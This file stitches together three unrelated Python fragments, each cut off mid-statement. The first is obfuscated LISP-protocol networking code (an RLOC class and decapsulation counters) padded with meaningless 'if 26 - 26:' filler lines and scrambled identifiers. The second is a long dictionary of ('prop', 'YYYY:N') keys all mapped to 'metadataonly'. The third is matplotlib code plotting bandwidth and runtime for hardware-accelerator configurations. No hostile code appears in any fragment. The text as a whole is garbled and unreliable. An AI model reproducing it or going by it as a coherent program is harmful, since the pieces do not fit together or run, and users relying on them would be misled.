if 26 - 26: o0oOOo0O0Ooo - I1IiiI / OoooooooOO / ooOoO0o % iIii1I11I1II1 % I1ii11iIi11i
OooOooo = ( "packet-count: {}{}packet-rate: {} pps{}byte-count: " + "{}{}bit-rate: {} mbps" ) . format ( iI1IiIiIIII11 , i1I1ii111 , II11 , i1I1ii111 , oOooO0O0 , i1I1ii111 ,
# Ii1I
iI1II1IiIiIi )
if 88 - 88: OoooooooOO
return ( OooOooo )
if 60 - 60: II111iiii % Oo0Ooo * I11i * OoO0O00 - OoOoOO00
if 65 - 65: iII111i
if 86 - 86: OoO0O00 / II111iiii % OoOoOO00 * OOooOOo . I1IiiI / IiII
if 100 - 100: i1IIi / I1IiiI * I1ii11iIi11i % ooOoO0o + OoO0O00 * oO0o
if 51 - 51: I1Ii111 - OoooooooOO / iII111i / I1IiiI % ooOoO0o / OoO0O00
if 45 - 45: i11iIiiIii - II111iiii / i1IIi * OoOoOO00
if 1 - 1: OOooOOo + I1IiiI + Ii1I . iII111i
if 89 - 89: I1Ii111 * I1IiiI . i1IIi - iIii1I11I1II1 * I1Ii111
lisp_decap_stats = {
"good-packets" : lisp_stats ( ) , "ICV-error" : lisp_stats ( ) ,
"checksum-error" : lisp_stats ( ) , "lisp-header-error" : lisp_stats ( ) ,
"no-decrypt-key" : lisp_stats ( ) , "bad-inner-version" : lisp_stats ( ) ,
"outer-header-error" : lisp_stats ( )
}
if 5 - 5: OoOoOO00 % i1IIi
if 31 - 31: Oo0Ooo * O0 . OOooOOo . o0oOOo0O0Ooo + OoO0O00 + II111iiii
if 76 - 76: Oo0Ooo + I1IiiI - O0
if 58 - 58: IiII * i1IIi . I1IiiI - iII111i
class lisp_rloc ( ) :
def __init__ ( self , recurse = True ) :
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_name = None
self . interface = None
self . translated_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . translated_port = 0
self . priority = 255
self . weight = 0
self . mpriority = 255
self . mweight = 0
self . uptime = 0
self . state = LISP_RLOC_UP_STATE
self . last_state_change = None
self . rle_name = None
self . elp_name = None
self . geo_name = None
self . json_name = None
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . stats = lisp_stats ( )
self . last_rloc_probe = None
self . last_rloc_probe_reply = None
self . rloc_probe_rtt = - 1
self . recent_rloc_probe_rtts = [ - 1 , - 1 , - 1 ]
self . rloc_probe_hops = "?/?"
self . recent_rloc_probe_hops = [ "?/?" , "?/?" , "?/?" ]
self . last_rloc_probe_nonce = 0
self . echo_nonce_capable = False
self . map_notify_requested = False
self . rloc_next_hop = None
self . next_rloc = None
if 73 - 73: Oo0Ooo . OoOoOO00
if ( recurse == False ) : return
if 50 - 50: IiII / o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo - OoO0O00 + iII111i / OoooooooOO
if 52 - 52: O0
if 34 - 34: OoooooooOO + OoOoOO00 - Oo0Ooo . OOooOOo * iIii1I11I1II1
if 93 - 93: i11iIiiIii / Oo0Ooo * OoOoOO00 / ooOoO0o + OoO0O00 * OOooOOo
if 81 - 81: IiII * iII111i + i1IIi + I1Ii111 / OoO0O00
oOOoO = lisp_get_default_route_next_hops ( )
if ( oOOoO == [ ] or len ( oOOoO ) == 1 ) : return
if 54 - 54: ooOoO0o
self . rloc_next_hop = oOOoO [ 0 ]
I1IIII = self
for iiIIII1I1ii in oOOoO [ 1 : : ] :
O0oo = lisp_rloc ( False )
O0oo = copy . deepcopy ( self )
O0oo . rloc_next_hop = iiIIII1I1ii
I1IIII . next_rloc = O0oo
I1IIII = O0oo
if 49 - 49: I11i + o0oOOo0O0Ooo % OOooOOo . iII111i
if 11 - 11: I1Ii111 - ooOoO0o
if 76 - 76: oO0o - i1IIi - O0 % Oo0Ooo
def up_state ( self ) :
return ( self . state == LISP_RLOC_UP_STATE )
if 66 - 66: IiII % iII111i / o0oOOo0O0Ooo
if 44 - 44: iIii1I11I1II1 + o0oOOo0O0Ooo + OoO0O00 * II111iiii
def unreach_state ( self ) :
return ( self . state == LISP_RLOC_UNREACH_STATE )
if 84 - 84: Oo0Ooo * I1Ii111 - o0oOOo0O0Ooo % Ii1I
if 69 - 69: I11i + OoOoOO00 - i11iIiiIii * O0 % O0
def no_echoed_nonce_state ( self ) :
return ( self . state == LISP_RLOC_NO_ECHOED_NONCE_STATE )
if 81 - 81: I11i - o0oOOo0O0Ooo % Ii1I / I1Ii111 * II111iiii
if 40 - 40: OoO0O00 . i11iIiiIii
def down_state ( self ) :
return ( self . state in [ LISP_RLOC_DOWN_STATE , LISP_RLOC_ADMIN_DOWN_STATE ] )
if 36 - 36: o0oOOo0O0Ooo * iII111i / I1ii11iIi11i % i1IIi % I1ii11iIi11i + i11iIiiIii
if 24 - 24: I1Ii111 / ooOoO0o - i11iIiiIii
if 32 - 32: II111iiii * Ii1I . ooOoO0o * Oo0Ooo - I1ii11iIi11i % I11i
def print_state ( self ) :
if ( self . state is LISP_RLOC_UNKNOWN_STATE ) :
return ( "unknown-state" )
if ( self . state is LISP_RLOC_UP_STATE ) :
return ( "up-state" )
if ( self . state is LISP_RLOC_DOWN_STATE ) :
return ( "down-state" )
if ( self . state is LISP_RLOC_ADMIN_DOWN_STATE ) :
return ( "admin-down-state" )
if ( self . state is LISP_RLOC_UNREACH_STATE ) :
return ( "unreach-state" )
if ( self . state is LISP_RLOC_NO_ECHOED_NONCE_STATE ) :
return ( "no-echoed-nonce-state" )
return ( "invalid-state" )
if 96 - 96: Ii1I / OOooOOo / O0
if 8 - 8: iII111i + OOooOOo / I1ii11iIi11i . iII111i
def print_rloc ( self , indent ) :
Oo0OO0000oooo = lisp_print_elapsed ( self . uptime )
lprint ( "{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}" . format ( indent ,
red ( self . rloc . print_address ( ) , False ) , Oo0OO0000oooo , self . print_state ( ) ,
self . priority , self . weight , self . mpriority , self . mweight ) )
if 45 - 45: i1IIi
if 28 - 28: iII111i
def print_rloc_name ( self , | |
"1905:19"): "metadataonly",
("prop", "1905:2"): "metadataonly",
("prop", "1905:20"): "metadataonly",
("prop", "1905:21"): "metadataonly",
("prop", "1905:22"): "metadataonly",
("prop", "1905:24"): "metadataonly",
("prop", "1905:25"): "metadataonly",
("prop", "1905:27"): "metadataonly",
("prop", "1905:28"): "metadataonly",
("prop", "1905:29"): "metadataonly",
("prop", "1905:3"): "metadataonly",
("prop", "1905:30"): "metadataonly",
("prop", "1905:31"): "metadataonly",
("prop", "1905:32"): "metadataonly",
("prop", "1905:33"): "metadataonly",
("prop", "1905:34"): "metadataonly",
("prop", "1905:35"): "metadataonly",
("prop", "1905:36"): "metadataonly",
("prop", "1905:37"): "metadataonly",
("prop", "1905:38"): "metadataonly",
("prop", "1905:39"): "metadataonly",
("prop", "1905:4"): "metadataonly",
("prop", "1905:40"): "metadataonly",
("prop", "1905:42"): "metadataonly",
("prop", "1905:43"): "metadataonly",
("prop", "1905:44"): "metadataonly",
("prop", "1905:45"): "metadataonly",
("prop", "1905:46"): "metadataonly",
("prop", "1905:47"): "metadataonly",
("prop", "1905:48"): "metadataonly",
("prop", "1905:49"): "metadataonly",
("prop", "1905:5"): "metadataonly",
("prop", "1905:50"): "metadataonly",
("prop", "1905:51"): "metadataonly",
("prop", "1905:52"): "metadataonly",
("prop", "1905:53"): "metadataonly",
("prop", "1905:54"): "metadataonly",
("prop", "1905:55"): "metadataonly",
("prop", "1905:56"): "metadataonly",
("prop", "1905:57"): "metadataonly",
("prop", "1905:58"): "metadataonly",
("prop", "1905:59"): "metadataonly",
("prop", "1905:6"): "metadataonly",
("prop", "1905:60"): "metadataonly",
("prop", "1905:61"): "metadataonly",
("prop", "1905:62"): "metadataonly",
("prop", "1905:63"): "metadataonly",
("prop", "1905:64"): "metadataonly",
("prop", "1905:65"): "metadataonly",
("prop", "1905:66"): "metadataonly",
("prop", "1905:67"): "metadataonly",
("prop", "1905:68"): "metadataonly",
("prop", "1905:69"): "metadataonly",
("prop", "1905:7"): "metadataonly",
("prop", "1905:70"): "metadataonly",
("prop", "1905:71"): "metadataonly",
("prop", "1905:72"): "metadataonly",
("prop", "1905:73"): "metadataonly",
("prop", "1905:74"): "metadataonly",
("prop", "1905:75"): "metadataonly",
("prop", "1905:76"): "metadataonly",
("prop", "1905:77"): "metadataonly",
("prop", "1905:78"): "metadataonly",
("prop", "1905:79"): "metadataonly",
("prop", "1905:8"): "metadataonly",
("prop", "1905:80"): "metadataonly",
("prop", "1905:81"): "metadataonly",
("prop", "1905:82"): "metadataonly",
("prop", "1905:83"): "metadataonly",
("prop", "1905:84"): "metadataonly",
("prop", "1905:85"): "metadataonly",
("prop", "1905:86"): "metadataonly",
("prop", "1905:87"): "metadataonly",
("prop", "1905:88"): "metadataonly",
("prop", "1905:89"): "metadataonly",
("prop", "1905:9"): "metadataonly",
("prop", "1905:90"): "metadataonly",
("prop", "1905:91"): "metadataonly",
("prop", "1905:93"): "metadataonly",
("prop", "1905:94"): "metadataonly",
("prop", "1905:95"): "metadataonly",
("prop", "1905:96"): "metadataonly",
("prop", "1905:98"): "metadataonly",
("prop", "1905:99"): "metadataonly",
("prop", "1906:1"): "metadataonly",
("prop", "1906:10"): "metadataonly",
("prop", "1906:100"): "metadataonly",
("prop", "1906:101"): "metadataonly",
("prop", "1906:102"): "metadataonly",
("prop", "1906:103"): "metadataonly",
("prop", "1906:104"): "metadataonly",
("prop", "1906:105"): "metadataonly",
("prop", "1906:106"): "metadataonly",
("prop", "1906:107"): "metadataonly",
("prop", "1906:108"): "metadataonly",
("prop", "1906:109"): "metadataonly",
("prop", "1906:11"): "metadataonly",
("prop", "1906:110"): "metadataonly",
("prop", "1906:111"): "metadataonly",
("prop", "1906:112"): "metadataonly",
("prop", "1906:113"): "metadataonly",
("prop", "1906:114"): "metadataonly",
("prop", "1906:115"): "metadataonly",
("prop", "1906:116"): "metadataonly",
("prop", "1906:117"): "metadataonly",
("prop", "1906:118"): "metadataonly",
("prop", "1906:119"): "metadataonly",
("prop", "1906:12"): "metadataonly",
("prop", "1906:120"): "metadataonly",
("prop", "1906:121"): "metadataonly",
("prop", "1906:122"): "metadataonly",
("prop", "1906:123"): "metadataonly",
("prop", "1906:124"): "metadataonly",
("prop", "1906:125"): "metadataonly",
("prop", "1906:126"): "metadataonly",
("prop", "1906:127"): "metadataonly",
("prop", "1906:128"): "metadataonly",
("prop", "1906:129"): "metadataonly",
("prop", "1906:13"): "metadataonly",
("prop", "1906:130"): "metadataonly",
("prop", "1906:131"): "metadataonly",
("prop", "1906:132"): "metadataonly",
("prop", "1906:133"): "metadataonly",
("prop", "1906:134"): "metadataonly",
("prop", "1906:135"): "metadataonly",
("prop", "1906:136"): "metadataonly",
("prop", "1906:137"): "metadataonly",
("prop", "1906:138"): "metadataonly",
("prop", "1906:139"): "metadataonly",
("prop", "1906:14"): "metadataonly",
("prop", "1906:140"): "metadataonly",
("prop", "1906:141"): "metadataonly",
("prop", "1906:142"): "metadataonly",
("prop", "1906:143"): "metadataonly",
("prop", "1906:144"): "metadataonly",
("prop", "1906:145"): "metadataonly",
("prop", "1906:146"): "metadataonly",
("prop", "1906:147"): "metadataonly",
("prop", "1906:148"): "metadataonly",
("prop", "1906:150"): "metadataonly",
("prop", "1906:151"): "metadataonly",
("prop", "1906:152"): "metadataonly",
("prop", "1906:153"): "metadataonly",
("prop", "1906:154"): "metadataonly",
("prop", "1906:155"): "metadataonly",
("prop", "1906:157"): "metadataonly",
("prop", "1906:158"): "metadataonly",
("prop", "1906:159"): "metadataonly",
("prop", "1906:16"): "metadataonly",
("prop", "1906:160"): "metadataonly",
("prop", "1906:161"): "metadataonly",
("prop", "1906:162"): "metadataonly",
("prop", "1906:163"): "metadataonly",
("prop", "1906:17"): "metadataonly",
("prop", "1906:18"): "metadataonly",
("prop", "1906:19"): "metadataonly",
("prop", "1906:2"): "metadataonly",
("prop", "1906:20"): "metadataonly",
("prop", "1906:22"): "metadataonly",
("prop", "1906:23"): "metadataonly",
("prop", "1906:24"): "metadataonly",
("prop", "1906:25"): "metadataonly",
("prop", "1906:26"): "metadataonly",
("prop", "1906:27"): "metadataonly",
("prop", "1906:28"): "metadataonly",
("prop", "1906:29"): "metadataonly",
("prop", "1906:3"): "metadataonly",
("prop", "1906:30"): "metadataonly",
("prop", "1906:31"): "metadataonly",
("prop", "1906:32"): "metadataonly",
("prop", "1906:33"): "metadataonly",
("prop", "1906:34"): "metadataonly",
("prop", "1906:35"): "metadataonly",
("prop", "1906:36"): "metadataonly",
("prop", "1906:37"): "metadataonly",
("prop", "1906:38"): "metadataonly",
("prop", "1906:39"): "metadataonly",
("prop", "1906:4"): "metadataonly",
("prop", "1906:40"): "metadataonly",
("prop", "1906:41"): "metadataonly",
("prop", "1906:42"): "metadataonly",
("prop", "1906:43"): "metadataonly",
("prop", "1906:44"): "metadataonly",
("prop", "1906:45"): "metadataonly",
("prop", "1906:46"): "metadataonly",
("prop", "1906:47"): "metadataonly",
("prop", "1906:48"): "metadataonly",
("prop", "1906:5"): "metadataonly",
("prop", "1906:50"): "metadataonly",
("prop", "1906:51"): "metadataonly",
("prop", "1906:52"): "metadataonly",
("prop", "1906:53"): "metadataonly",
("prop", "1906:56"): "metadataonly",
("prop", "1906:57"): "metadataonly",
("prop", "1906:58"): "metadataonly",
("prop", "1906:59"): "metadataonly",
("prop", "1906:6"): "metadataonly",
("prop", "1906:60"): "metadataonly",
("prop", "1906:61"): "metadataonly",
("prop", "1906:62"): "metadataonly",
("prop", "1906:63"): "metadataonly",
("prop", "1906:64"): "metadataonly",
("prop", "1906:65"): "metadataonly",
("prop", "1906:66"): "metadataonly",
("prop", "1906:67"): "metadataonly",
("prop", "1906:68"): "metadataonly",
("prop", "1906:69"): "metadataonly",
("prop", "1906:7"): "metadataonly",
("prop", "1906:70"): "metadataonly",
("prop", "1906:71"): "metadataonly",
("prop", "1906:72"): "metadataonly",
("prop", "1906:73"): "metadataonly",
("prop", "1906:74"): "metadataonly",
("prop", "1906:75"): "metadataonly",
("prop", "1906:76"): "metadataonly",
("prop", "1906:77"): "metadataonly",
("prop", "1906:78"): "metadataonly",
("prop", "1906:79"): "metadataonly",
("prop", "1906:8"): "metadataonly",
("prop", "1906:80"): "metadataonly",
("prop", "1906:81"): "metadataonly",
("prop", "1906:82"): "metadataonly",
("prop", "1906:83"): "metadataonly",
("prop", "1906:85"): "metadataonly",
("prop", "1906:86"): "metadataonly",
("prop", "1906:87"): "metadataonly",
("prop", "1906:88"): "metadataonly",
("prop", "1906:89"): "metadataonly",
("prop", "1906:9"): "metadataonly",
("prop", "1906:90"): "metadataonly",
("prop", "1906:91"): "metadataonly",
("prop", "1906:92"): "metadataonly",
("prop", "1906:93"): "metadataonly",
("prop", "1906:94"): "metadataonly",
("prop", "1906:95"): "metadataonly",
("prop", "1906:96"): "metadataonly",
("prop", "1906:97"): "metadataonly",
("prop", "1906:98"): "metadataonly",
("prop", "1906:99"): "metadataonly",
("prop", "1907:1"): "metadataonly",
("prop", "1907:100"): "metadataonly",
("prop", "1907:101"): "metadataonly",
("prop", "1907:102"): "metadataonly",
("prop", "1907:103"): "metadataonly",
("prop", "1907:104"): "metadataonly",
("prop", "1907:105"): "metadataonly",
("prop", "1907:106"): "metadataonly",
("prop", "1907:107"): "metadataonly",
("prop", "1907:108"): "metadataonly",
("prop", "1907:109"): "metadataonly",
("prop", "1907:11"): "metadataonly",
("prop", "1907:110"): "metadataonly",
("prop", "1907:111"): "metadataonly",
("prop", "1907:112"): "metadataonly",
("prop", "1907:113"): "metadataonly",
("prop", "1907:114"): "metadataonly",
("prop", "1907:115"): "metadataonly",
("prop", "1907:116"): "metadataonly",
("prop", "1907:117"): "metadataonly",
("prop", "1907:118"): "metadataonly",
("prop", "1907:119"): "metadataonly",
("prop", "1907:12"): "metadataonly",
("prop", "1907:120"): "metadataonly",
("prop", "1907:121"): "metadataonly",
("prop", "1907:122"): "metadataonly",
("prop", "1907:123"): "metadataonly",
("prop", "1907:124"): "metadataonly",
("prop", "1907:125"): "metadataonly",
("prop", "1907:126"): "metadataonly",
("prop", "1907:127"): "metadataonly",
("prop", "1907:128"): "metadataonly",
("prop", "1907:129"): "metadataonly",
("prop", "1907:13"): "metadataonly",
("prop", "1907:130"): "metadataonly",
("prop", "1907:131"): "metadataonly",
("prop", "1907:132"): "metadataonly",
("prop", "1907:133"): "metadataonly",
("prop", "1907:134"): "metadataonly",
("prop", "1907:135"): "metadataonly",
("prop", "1907:136"): "metadataonly",
("prop", "1907:137"): "metadataonly",
("prop", "1907:138"): "metadataonly",
("prop", "1907:139"): "metadataonly",
("prop", "1907:14"): "metadataonly",
("prop", "1907:140"): "metadataonly",
("prop", "1907:141"): "metadataonly",
("prop", "1907:142"): "metadataonly",
("prop", "1907:143"): "metadataonly",
("prop", "1907:144"): "metadataonly",
("prop", "1907:145"): "metadataonly",
("prop", "1907:146"): "metadataonly",
("prop", "1907:147"): "metadataonly",
("prop", "1907:148"): "metadataonly",
("prop", "1907:149"): "metadataonly",
("prop", "1907:15"): "metadataonly",
("prop", "1907:150"): "metadataonly",
("prop", "1907:151"): "metadataonly",
("prop", "1907:152"): "metadataonly",
("prop", "1907:153"): "metadataonly",
("prop", "1907:154"): "metadataonly",
("prop", "1907:155"): "metadataonly",
("prop", "1907:157"): "metadataonly",
("prop", "1907:158"): "metadataonly",
("prop", "1907:159"): "metadataonly",
("prop", "1907:16"): "metadataonly",
("prop", "1907:160"): "metadataonly",
("prop", "1907:161"): "metadataonly",
("prop", "1907:162"): "metadataonly",
("prop", "1907:163"): "metadataonly",
("prop", "1907:164"): "metadataonly",
("prop", "1907:165"): "metadataonly",
("prop", "1907:166"): "metadataonly",
("prop", "1907:167"): "metadataonly",
("prop", "1907:168"): "metadataonly",
("prop", "1907:169"): "metadataonly",
("prop", "1907:17"): "metadataonly",
("prop", "1907:170"): "metadataonly",
("prop", "1907:171"): "metadataonly",
("prop", "1907:172"): "metadataonly",
("prop", "1907:173"): "metadataonly",
("prop", "1907:174"): "metadataonly",
("prop", "1907:175"): "metadataonly",
("prop", "1907:176"): "metadataonly",
("prop", "1907:177"): "metadataonly",
("prop", "1907:178"): "metadataonly",
("prop", "1907:179"): "metadataonly",
("prop", "1907:180"): "metadataonly",
("prop", "1907:181"): "metadataonly",
("prop", "1907:182"): "metadataonly",
("prop", "1907:183"): "metadataonly",
("prop", "1907:184"): "metadataonly",
("prop", "1907:185"): "metadataonly",
("prop", "1907:186"): "metadataonly",
("prop", "1907:187"): "metadataonly",
("prop", "1907:188"): "metadataonly",
("prop", "1907:189"): "metadataonly",
("prop", "1907:19"): "metadataonly",
("prop", "1907:190"): "metadataonly",
("prop", "1907:191"): "metadataonly",
("prop", "1907:192"): "metadataonly",
("prop", "1907:193"): "metadataonly",
("prop", "1907:194"): "metadataonly",
("prop", "1907:195"): "metadataonly",
("prop", "1907:196"): "metadataonly",
("prop", "1907:197"): "metadataonly",
("prop", "1907:198"): "metadataonly",
("prop", "1907:199"): "metadataonly",
("prop", "1907:2"): "metadataonly",
("prop", "1907:20"): "metadataonly",
("prop", "1907:200"): "metadataonly",
("prop", "1907:21"): "metadataonly",
("prop", "1907:23"): "metadataonly",
("prop", "1907:24"): "metadataonly",
("prop", "1907:25"): "metadataonly",
("prop", "1907:27"): "metadataonly",
("prop", "1907:3"): "metadataonly",
("prop", "1907:31"): "metadataonly",
("prop", "1907:32"): "metadataonly",
("prop", "1907:33"): "metadataonly",
("prop", "1907:34"): "metadataonly",
("prop", "1907:35"): "metadataonly",
("prop", "1907:36"): "metadataonly",
("prop", "1907:37"): "metadataonly",
("prop", "1907:38"): "metadataonly",
("prop", "1907:39"): "metadataonly",
("prop", "1907:4"): "metadataonly",
("prop", "1907:40"): "metadataonly",
("prop", "1907:41"): "metadataonly",
("prop", "1907:42"): "metadataonly",
("prop", "1907:43"): "metadataonly",
("prop", "1907:44"): "metadataonly",
("prop", "1907:45"): "metadataonly",
("prop", "1907:46"): "metadataonly",
("prop", "1907:47"): "metadataonly",
("prop", "1907:48"): "metadataonly",
("prop", "1907:49"): "metadataonly",
("prop", "1907:5"): "metadataonly",
("prop", "1907:50"): "metadataonly",
("prop", "1907:51"): "metadataonly",
("prop", "1907:52"): "metadataonly",
("prop", "1907:53"): "metadataonly",
("prop", "1907:54"): "metadataonly",
("prop", "1907:55"): "metadataonly",
("prop", "1907:56"): "metadataonly",
("prop", "1907:57"): "metadataonly",
("prop", "1907:58"): "metadataonly",
("prop", "1907:59"): "metadataonly",
("prop", "1907:6"): "metadataonly",
("prop", "1907:60"): "metadataonly",
("prop", "1907:61"): "metadataonly",
("prop", "1907:62"): "metadataonly",
("prop", "1907:63"): "metadataonly",
("prop", "1907:64"): "metadataonly",
("prop", "1907:65"): "metadataonly",
("prop", "1907:66"): "metadataonly",
("prop", "1907:67"): "metadataonly",
("prop", "1907:68"): "metadataonly",
("prop", "1907:69"): "metadataonly",
("prop", "1907:7"): "metadataonly",
("prop", "1907:71"): "metadataonly",
("prop", "1907:72"): "metadataonly",
("prop", "1907:73"): "metadataonly",
("prop", "1907:74"): "metadataonly",
("prop", "1907:75"): "metadataonly",
("prop", "1907:76"): "metadataonly",
("prop", "1907:77"): "metadataonly",
("prop", "1907:78"): "metadataonly",
("prop", "1907:79"): "metadataonly",
("prop", "1907:8"): "metadataonly",
("prop", "1907:80"): "metadataonly",
("prop", "1907:81"): "metadataonly",
("prop", "1907:82"): "metadataonly",
("prop", "1907:83"): "metadataonly",
("prop", "1907:84"): "metadataonly",
("prop", "1907:85"): "metadataonly",
("prop", "1907:86"): "metadataonly",
("prop", "1907:87"): "metadataonly",
("prop", "1907:88"): "metadataonly",
("prop", "1907:89"): "metadataonly",
("prop", "1907:90"): "metadataonly",
("prop", "1907:91"): "metadataonly",
("prop", "1907:92"): "metadataonly",
("prop", "1907:93"): "metadataonly",
("prop", "1907:94"): "metadataonly",
("prop", "1907:95"): "metadataonly",
("prop", "1907:96"): "metadataonly",
("prop", "1907:97"): "metadataonly",
| |
+ name + "_energy.csv", index=31)) # sa D
energy_list.append(return_indexed_elems(input_csv=path + name + "_energy.csv", index=32)) # sa L
# bandwidth
my_dpi = 300
if a == "eyeriss":
fig_h = 1.6
else:
fig_h = 1.3
fig_w = 3.3115
bp_color = "#7A81FF"
bs_color = "#FF7F7F"
u6_color = "#666666"
u7_color = "#888888"
u8_color = "#AAAAAA"
ug_color = "#CCCCCC"
bg_color = "#D783FF"
x_axis = ["Average"]
fig, ax = plt.subplots(figsize=(fig_w, fig_h))
idx_tot = 6
x_idx = np.arange(len(x_axis))
width = 1 / 2**(math.ceil(math.log2(idx_tot)))
iterval = width
# 8b - spm - bp
index = 0
dram_bw_list = bw_list[index * 2][-1:]
sram_bw_list = [-x for x in bw_list[index * 2 + 1][-1:]]
idx = 1.5
ax.bar(x_idx + iterval * (idx - idx_tot / 2), dram_bw_list, width, hatch = None, alpha=0.99, color=bp_color, label="Binary Parallel")
ax.bar(x_idx + iterval * (idx - idx_tot / 2), sram_bw_list, width, hatch = None, alpha=0.99, color=bp_color)
dram_bw_list_bp_spm = [i for i in dram_bw_list]
sram_bw_list_bp_spm = [i for i in sram_bw_list]
# 8b - spm - bs
index = 1
dram_bw_list = bw_list[index * 2][-1:]
sram_bw_list = [-x for x in bw_list[index * 2 + 1][-1:]]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), dram_bw_list, width, hatch = None, alpha=0.99, color=bs_color, label="Binary Serial")
ax.bar(x_idx + iterval * (idx - idx_tot / 2), sram_bw_list, width, hatch = None, alpha=0.99, color=bs_color)
dram_bw_list_bs_spm = [i for i in dram_bw_list]
sram_bw_list_bs_spm = [i for i in sram_bw_list]
# 8b - wospm - ur - 32c
index = 2
dram_bw_list = bw_list[index * 2][-1:]
sram_bw_list = [-x for x in bw_list[index * 2 + 1][-1:]]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), dram_bw_list, width, hatch = None, alpha=0.99, color=u6_color)
ax.bar(x_idx + iterval * (idx - idx_tot / 2), sram_bw_list, width, hatch = None, alpha=0.99, color=u6_color)
dram_bw_list_u6_wspm = [i for i in dram_bw_list]
sram_bw_list_u6_wspm = [i for i in sram_bw_list]
# 8b - wospm - ur - 64c
index = 3
dram_bw_list = bw_list[index * 2][-1:]
sram_bw_list = [-x for x in bw_list[index * 2 + 1][-1:]]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), dram_bw_list, width, hatch = None, alpha=0.99, color=u7_color)
ax.bar(x_idx + iterval * (idx - idx_tot / 2), sram_bw_list, width, hatch = None, alpha=0.99, color=u7_color)
dram_bw_list_u7_wspm = [i for i in dram_bw_list]
sram_bw_list_u7_wspm = [i for i in sram_bw_list]
# 8b - wospm - ur - 128c
index = 4
dram_bw_list = bw_list[index * 2][-1:]
sram_bw_list = [-x for x in bw_list[index * 2 + 1][-1:]]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), dram_bw_list, width, hatch = None, alpha=0.99, color=u8_color)
ax.bar(x_idx + iterval * (idx - idx_tot / 2), sram_bw_list, width, hatch = None, alpha=0.99, color=u8_color)
dram_bw_list_u8_wspm = [i for i in dram_bw_list]
sram_bw_list_u8_wspm = [i for i in sram_bw_list]
# 8b - wospm - ug - 256c
index = 5
dram_bw_list = bw_list[index * 2][-1:]
sram_bw_list = [-x for x in bw_list[index * 2 + 1][-1:]]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), dram_bw_list, width, hatch = None, alpha=0.99, color=ug_color)
ax.bar(x_idx + iterval * (idx - idx_tot / 2), sram_bw_list, width, hatch = None, alpha=0.99, color=ug_color)
dram_bw_list_ug_wspm = [i for i in dram_bw_list]
sram_bw_list_ug_wspm = [i for i in sram_bw_list]
ax.set_ylabel('SRAM-DRAM bandwidth\n(GB/s)')
ax.set_xticks(x_idx)
ax.set_xticklabels(x_axis)
plt.xlim(x_idx[0]-0.5, x_idx[-1]+0.5)
plt.yscale("symlog", linthresh=0.001)
# locs, labels = plt.yticks()
if a == "eyeriss":
locs = [-10, -1, -0.1, -0.01, -0.001, 0, 0.001, 0.01, 0.1, 1, 10]
else:
locs = [-10, -1, -0.1, -0.01, -0.001, 0, 0.001, 0.01, 0.1, 1, 10]
ax.set_yticks(locs)
y_label_list = []
for y in locs:
if y != 0:
y_label_list.append("{:1.0E}".format(abs(y)))
else:
y_label_list.append("0")
ax.set_yticklabels(y_label_list)
bottom, top = plt.ylim()
if a == "eyeriss":
ax.set_ylim((bottom, top*2500))
bottom, top = plt.ylim()
for x in x_idx:
ax.fill_betweenx([bottom, top/2500], x1=x, x2=x+0.5, alpha=0.2, color=bg_color, linewidth=0)
ax.legend(loc="upper center", ncol=3, frameon=True)
else:
ax.set_ylim((bottom, top))
bottom, top = plt.ylim()
for x in x_idx:
ax.fill_betweenx([bottom, top], x1=x, x2=x+0.5, alpha=0.2, color=bg_color, linewidth=0)
ax.axhline(y=0, color="k", linewidth = 0.1)
fig.tight_layout()
plt.savefig('./outputs_fig/' + technode + '/Bandwidth_' + a_cap + ".pdf", bbox_inches='tight', dpi=my_dpi, pad_inches=0.02)
if print_bandwidth:
print("DRAM bp spm :", dram_bw_list_bp_spm)
print("min:", min(dram_bw_list_bp_spm), "max:", max(dram_bw_list_bp_spm))
print("DRAM bs spm :", dram_bw_list_bs_spm)
print("min:", min(dram_bw_list_bs_spm), "max:", max(dram_bw_list_bs_spm))
print("SRAM bp spm :", sram_bw_list_bp_spm)
print("SRAM bs spm :", sram_bw_list_bs_spm)
print("DRAM u6 wspm:", dram_bw_list_u6_wspm)
print("min:", min(dram_bw_list_u6_wspm), "max:", max(dram_bw_list_u6_wspm))
print("DRAM u7 wspm:", dram_bw_list_u7_wspm)
print("min:", min(dram_bw_list_u7_wspm), "max:", max(dram_bw_list_u7_wspm))
print("DRAM u8 wspm:", dram_bw_list_u8_wspm)
print("min:", min(dram_bw_list_u8_wspm), "max:", max(dram_bw_list_u8_wspm))
print("DRAM ug wspm:", dram_bw_list_ug_wspm)
print("min:", min(dram_bw_list_ug_wspm), "max:", max(dram_bw_list_ug_wspm))
sram_bw_r_list_bp_spm = []
sram_bw_r_list_bs_spm = []
for i in range(len(dram_bw_list_bp_spm)):
sram_bw_r_list_bp_spm.append(-sram_bw_list_bp_spm[i] / dram_bw_list_bp_spm[i])
sram_bw_r_list_bs_spm.append(-sram_bw_list_bs_spm[i] / dram_bw_list_bs_spm[i])
print("SRAM bp wspm r:", sram_bw_r_list_bp_spm)
print("SRAM bs wspm r:", sram_bw_r_list_bs_spm)
print("Bandwidth fig saved!\n")
# runtime
my_dpi = 300
if a == "eyeriss":
fig_h = 1.1
else:
fig_h = 1
fig_w = 3.3115
bp_color = "#7A81FF"
bs_color = "#FF7F7F"
u6_color = "#666666"
u7_color = "#888888"
u8_color = "#AAAAAA"
ug_color = "#CCCCCC"
bg_color = "#D783FF"
x_axis = ["Average"]
fig, ax = plt.subplots(figsize=(fig_w, fig_h))
idx_tot = 6
x_idx = np.arange(len(x_axis))
width = 1 / 2**(math.ceil(math.log2(idx_tot)))
iterval = width
# 8b - spm - bp
index = 0
runtime_list = time_list[index][-1:]
idx = 1.5
ax.bar(x_idx + iterval * (idx - idx_tot / 2), runtime_list, width, hatch = None, alpha=0.99, color=bp_color, label="Binary Parallel")
runtime_ideal_r_list_bp_spm = []
for i in range(len(runtime_list)):
runtime_ideal_r_list_bp_spm.append(runtime_list[i] / time_ideal_list[index][-1:][i] - 1)
# 8b - spm - bs
index = 1
runtime_list = time_list[index][-1:]
idx += 1
